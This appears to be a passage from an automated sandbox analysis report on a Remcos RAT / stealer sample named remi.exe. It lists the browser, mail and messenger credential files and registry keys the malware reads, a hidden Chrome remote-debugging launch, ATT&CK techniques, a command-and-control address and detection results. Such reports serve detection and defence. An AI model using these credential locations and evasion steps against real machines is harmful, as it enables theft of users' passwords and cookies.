                    Source: C:\Users\user\Desktop\remi.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data6_2_0040B21B
                    Source: C:\Users\user\Desktop\remi.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\6_2_0040B335
                    Source: C:\Users\user\Desktop\remi.exeCode function: \key3.db6_2_0040B335
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: ESMTPPassword16_2_004033F0
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword16_2_00402DB3
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword16_2_00402DB3
                    Source: Yara matchFile source: Process Memory Space: WinUpdate.exe PID: 7356, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                    Source: C:\Users\user\Desktop\remi.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-E10MWOJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-E10MWOJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-E10MWO
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-E10MWO
                    Source: Yara matchFile source: 0.2.remi.exe.7e60000.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.remi.exe.427e790.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.remi.exe.7e60000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.remi.exe.427e790.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2150371712.0000000007E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2140941294.0000000004261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0.2.remi.exe.4d9f320.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.remi.exe.435c6b8.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.remi.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.remi.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.remi.exe.4d9f320.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.remi.exe.435c6b8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.remi.exe.427e790.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2140941294.0000000004D9F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2140941294.0000000004261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: remi.exe PID: 4372, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: remi.exe PID: 4152, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\WinUpdat\WinUpdat.dat, type: DROPPED
                    Source: C:\Users\user\Desktop\remi.exeCode function: cmd.exe6_2_00405042
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
                    Native API
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    11
                    Disable or Modify Tools
                    2
                    OS Credential Dumping
                    2
                    System Time Discovery
                    Remote Services12
                    Archive Collected Data
                    12
                    Ingress Tool Transfer
                    Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts12
                    Command and Scripting Interpreter
                    1
                    Windows Service
                    1
                    Bypass User Account Control
                    11
                    Deobfuscate/Decode Files or Information
                    211
                    Input Capture
                    1
                    Account Discovery
                    Remote Desktop Protocol1
                    Data from Local System
                    21
                    Encrypted Channel
                    Exfiltration Over Bluetooth1
                    Defacement
                    Email AddressesDNS ServerDomain Accounts2
                    Service Execution
                    11
                    Registry Run Keys / Startup Folder
                    1
                    Extra Window Memory Injection
                    3
                    Obfuscated Files or Information
                    2
                    Credentials in Registry
                    1
                    System Service Discovery
                    SMB/Windows Admin Shares1
                    Email Collection
                    1
                    Non-Standard Port
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    Access Token Manipulation
                    22
                    Software Packing
                    3
                    Credentials In Files
                    3
                    File and Directory Discovery
                    Distributed Component Object Model211
                    Input Capture
                    2
                    Remote Access Software
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                    Windows Service
                    1
                    Timestomp
                    LSA Secrets38
                    System Information Discovery
                    SSH3
                    Clipboard Data
                    3
                    Non-Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts222
                    Process Injection
                    1
                    DLL Side-Loading
                    Cached Domain Credentials131
                    Security Software Discovery
                    VNCGUI Input Capture14
                    Application Layer Protocol
                    Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items11
                    Registry Run Keys / Startup Folder
                    1
                    Bypass User Account Control
                    DCSync31
                    Virtualization/Sandbox Evasion
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Extra Window Memory Injection
                    Proc Filesystem4
                    Process Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Masquerading
                    /etc/passwd and /etc/shadow1
                    Application Window Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron31
                    Virtualization/Sandbox Evasion
                    Network Sniffing1
                    System Owner/User Discovery
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                    Access Token Manipulation
                    Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                    Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task222
                    Process Injection
                    KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1564312 Sample: remi.exe Startdate: 28/11/2024 Architecture: WINDOWS Score: 100 91 geoplugin.net 2->91 115 Suricata IDS alerts for network traffic 2->115 117 Found malware configuration 2->117 119 Malicious sample detected (through community Yara rule) 2->119 121 15 other signatures 2->121 11 remi.exe 4 2->11         started        15 WinUpdate.exe 2->15         started        17 msedge.exe 2->17         started        19 WinUpdate.exe 2->19         started        signatures3 process4 file5 83 C:\Users\user\AppData\Local\...\remi.exe.log, ASCII 11->83 dropped 143 Contains functionality to bypass UAC (CMSTPLUA) 11->143 145 Contains functionalty to change the wallpaper 11->145 147 Contains functionality to steal Chrome passwords or cookies 11->147 153 4 other signatures 11->153 21 remi.exe 1 4 11->21         started        25 powershell.exe 23 11->25         started        27 remi.exe 11->27         started        149 Injects a PE file into a foreign processes 15->149 29 WinUpdate.exe 15->29         started        31 WinUpdate.exe 15->31         started        151 Maps a DLL or memory area into another process 17->151 33 msedge.exe 17->33         started        40 4 other processes 17->40 36 WinUpdate.exe 19->36         started        38 WinUpdate.exe 19->38         started        signatures6 process7 dnsIp8 77 C:\Users\user\AppData\Local\...\WinUpdate.exe, PE32 21->77 dropped 79 C:\Users\...\WinUpdate.exe:Zone.Identifier, ASCII 21->79 dropped 123 Detected Remcos RAT 21->123 125 Creates autostart registry keys with suspicious names 21->125 42 WinUpdate.exe 4 21->42         started        127 Loading BitLocker PowerShell Module 25->127 45 conhost.exe 25->45         started        85 sb.scorecardresearch.com 18.165.220.66, 443, 49786 MIT-GATEWAYSUS United States 33->85 87 s-part-0035.t-0009.t-msedge.net 13.107.246.63, 443, 49721, 49723 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 33->87 89 14 other IPs or domains 33->89 81 C:\Users\user\AppData\Local\...\Cookies, SQLite 33->81 dropped file9 signatures10 process11 signatures12 135 Multi AV Scanner detection for dropped file 42->135 137 Attempt to bypass Chrome Application-Bound Encryption 42->137 139 Tries to steal Mail credentials (via file registry) 42->139 141 2 other signatures 42->141 47 WinUpdate.exe 3 30 42->47         started        52 powershell.exe 23 42->52         started        54 WinUpdate.exe 42->54         started        process13 dnsIp14 101 45.138.48.25, 3333, 49712, 49714 ASDETUKhttpwwwheficedcomGB Germany 47->101 103 geoplugin.net 178.237.33.50, 49718, 80 ATOM86-ASATOM86NL Netherlands 47->103 105 127.0.0.1 unknown unknown 47->105 75 C:\ProgramData\WinUpdat\WinUpdat.dat, data 47->75 dropped 107 Detected Remcos RAT 47->107 109 Tries to harvest and steal browser information (history, passwords, etc) 47->109 111 Installs a global keyboard hook 47->111 56 WinUpdate.exe 47->56         started        59 WinUpdate.exe 47->59         started        61 WinUpdate.exe 47->61         started        67 2 other processes 47->67 113 Loading BitLocker PowerShell Module 52->113 63 conhost.exe 52->63         started        65 WmiPrvSE.exe 52->65         started        file15 signatures16 process17 dnsIp18 129 Tries to steal Instant Messenger accounts or passwords 56->129 131 Tries to steal Mail credentials (via file / registry access) 56->131 133 Tries to harvest and steal browser information (history, passwords, etc) 59->133 93 192.168.2.6, 138, 3333, 443 unknown unknown 67->93 95 239.255.255.250 unknown Reserved 67->95 70 chrome.exe 67->70         started        73 msedge.exe 67->73         started        signatures19 process20 dnsIp21 97 googlehosted.l.googleusercontent.com 172.217.19.225, 443, 49740, 49773 GOOGLEUS United States 70->97 99 clients2.googleusercontent.com 70->99

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    remi.exe58%VirustotalBrowse
                    remi.exe63%ReversingLabsByteCode-MSIL.Trojan.PureLogStealer
                    remi.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe63%ReversingLabsByteCode-MSIL.Trojan.PureLogStealer
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://tls-tunnel-check.googlezip.net/connect20%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    chrome.cloudflare-dns.com
                    172.64.41.3
                    truefalse
                      high
                      geoplugin.net
                      178.237.33.50
                      truefalse
                        high
                        ssl.bingadsedgeextension-prod-europe.azurewebsites.net
                        94.245.104.56
                        truefalse
                          high
                          sb.scorecardresearch.com
                          18.165.220.66
                          truefalse
                            high
                            s-part-0035.t-0009.t-msedge.net
                            13.107.246.63
                            truefalse
                              high
                              googlehosted.l.googleusercontent.com
                              172.217.19.225
                              truefalse
                                high
                                clients2.googleusercontent.com
                                unknown
                                unknownfalse
                                  high
                                  bzib.nelreports.net
                                  unknown
                                  unknownfalse
                                    high
                                    assets.msn.com
                                    unknown
                                    unknownfalse
                                      high
                                      c.msn.com
                                      unknown
                                      unknownfalse
                                        high
                                        ntp.msn.com
                                        unknown
                                        unknownfalse
                                          high
                                          api.msn.com
                                          unknown
                                          unknownfalse
                                            high
                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://duckduckgo.com/chrome_newtabWeb Data.25.drfalse
                                              high
                                              https://www.google.com/coacbEchrome.exe, 0000000E.00000003.2203823206.000010A800A04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.imvu.comrWinUpdate.exe, 00000011.00000002.2198792719.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                  high
                                                  https://duckduckgo.com/ac/?q=Web Data.25.drfalse
                                                    high
                                                    https://google-ohttp-relay-join.fastly-edge.com/2chrome.exe, 0000000E.00000003.2308825209.00002C7801F30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2308864089.00002C7801F34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://permanently-removed.invalid/oauth2/v2/tokeninfomsedge.exe, 00000017.00000003.2336607244.0000230400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2336694769.0000230400284000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://google-ohttp-relay-join.fastly-edge.com/1chrome.exe, 0000000E.00000003.2223756334.000010A80154C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2223833913.000010A801550000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://google-ohttp-relay-join.fastly-edge.com/0chrome.exe, 0000000E.00000003.2223901000.000010A801560000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://anglebug.com/4633chrome.exe, 0000000E.00000003.2252649248.00002C780036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253719796.00002C78009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://google-ohttp-relay-join.fastly-edge.com/5chrome.exe, 0000000E.00000003.2223756334.000010A80154C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2223833913.000010A801550000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://anglebug.com/7382chrome.exe, 0000000E.00000003.2252649248.00002C780036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253719796.00002C78009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://issuetracker.google.com/284462263chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.nirsoft.netWinUpdate.exe, 0000000F.00000002.2216945065.0000000000CF4000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://google-ohttp-relay-join.fastly-edge.com/Cchrome.exe, 0000000E.00000003.2312495590.00002C7802108000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2311767217.00002C78020F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312528521.00002C780210C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312460742.00002C78020F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312563079.00002C7802110000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312663885.00002C7802118000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312598507.00002C7802114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312383476.00002C78020F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://google-ohttp-relay-join.fastly-edge.com/Bchrome.exe, 0000000E.00000003.2312383476.00002C78020F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://publickeyservice.gcp.privacysandboxservices.comchrome.exe, 0000000E.00000003.2291899443.00002C780120C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://docs.google.com/manifest.json.25.drfalse
                                                                              high
                                                                              https://google-ohttp-relay-join.fastly-edge.com/Echrome.exe, 0000000E.00000003.2308825209.00002C7801F30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2308864089.00002C7801F34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://publickeyservice.pa.aws.privacysandboxservices.comchrome.exe, 0000000E.00000003.2291899443.00002C780120C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://google-ohttp-relay-join.fastly-edge.com/Dchrome.exe, 0000000E.00000003.2308825209.00002C7801F30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312495590.00002C7802108000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2311767217.00002C78020F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312528521.00002C780210C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312460742.00002C78020F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312563079.00002C7802110000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312663885.00002C7802118000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2308864089.00002C7801F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312598507.00002C7802114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312383476.00002C78020F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://google-ohttp-relay-join.fastly-edge.com/Kchrome.exe, 0000000E.00000003.2308825209.00002C7801F30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312495590.00002C7802108000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2311767217.00002C78020F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312528521.00002C780210C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312460742.00002C78020F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2308864089.00002C7801F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312383476.00002C78020F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://anglebug.com/7714chrome.exe, 0000000E.00000003.2252649248.00002C780036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253719796.00002C78009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://google-ohttp-relay-join.fastly-edge.com/Ichrome.exe, 0000000E.00000003.2312495590.00002C7802108000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2311767217.00002C78020F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312528521.00002C780210C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312460742.00002C78020F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312563079.00002C7802110000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312663885.00002C7802118000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312598507.00002C7802114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312383476.00002C78020F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://google-ohttp-relay-join.fastly-edge.com/Ochrome.exe, 0000000E.00000003.2312495590.00002C7802108000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2311767217.00002C78020F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312528521.00002C780210C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312460742.00002C78020F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312563079.00002C7802110000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312663885.00002C7802118000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312598507.00002C7802114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312383476.00002C78020F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://google-ohttp-relay-join.fastly-edge.com/Nchrome.exe, 0000000E.00000003.2308825209.00002C7801F30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2308864089.00002C7801F34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://google-ohttp-relay-join.fastly-edge.com/Schrome.exe, 0000000E.00000003.2312495590.00002C7802108000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2311767217.00002C78020F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312528521.00002C780210C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312460742.00002C78020F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312563079.00002C7802110000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312663885.00002C7802118000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312598507.00002C7802114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312383476.00002C78020F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://google-ohttp-relay-join.fastly-edge.com/Rchrome.exe, 0000000E.00000003.2311767217.00002C78020F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://google-ohttp-relay-join.fastly-edge.com/J$chrome.exe, 0000000E.00000003.2312495590.00002C7802108000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2311767217.00002C78020F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312528521.00002C780210C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312460742.00002C78020F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312563079.00002C7802110000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312663885.00002C7802118000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312598507.00002C7802114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312383476.00002C78020F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://google-ohttp-relay-join.fastly-edge.com/Qchrome.exe, 0000000E.00000003.2312495590.00002C7802108000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2311767217.00002C78020F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312528521.00002C780210C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312460742.00002C78020F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312383476.00002C78020F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://google-ohttp-relay-join.fastly-edge.com/Pchrome.exe, 0000000E.00000003.2308825209.00002C7801F30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312495590.00002C7802108000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2311767217.00002C78020F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312528521.00002C780210C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312460742.00002C78020F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312563079.00002C7802110000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312663885.00002C7802118000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2308864089.00002C7801F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312598507.00002C7802114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312383476.00002C78020F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://google-ohttp-relay-join.fastly-edge.com/Vchrome.exe, 0000000E.00000003.2312495590.00002C7802108000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2311767217.00002C78020F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312528521.00002C780210C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312460742.00002C78020F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312563079.00002C7802110000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312663885.00002C7802118000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312598507.00002C7802114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312383476.00002C78020F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
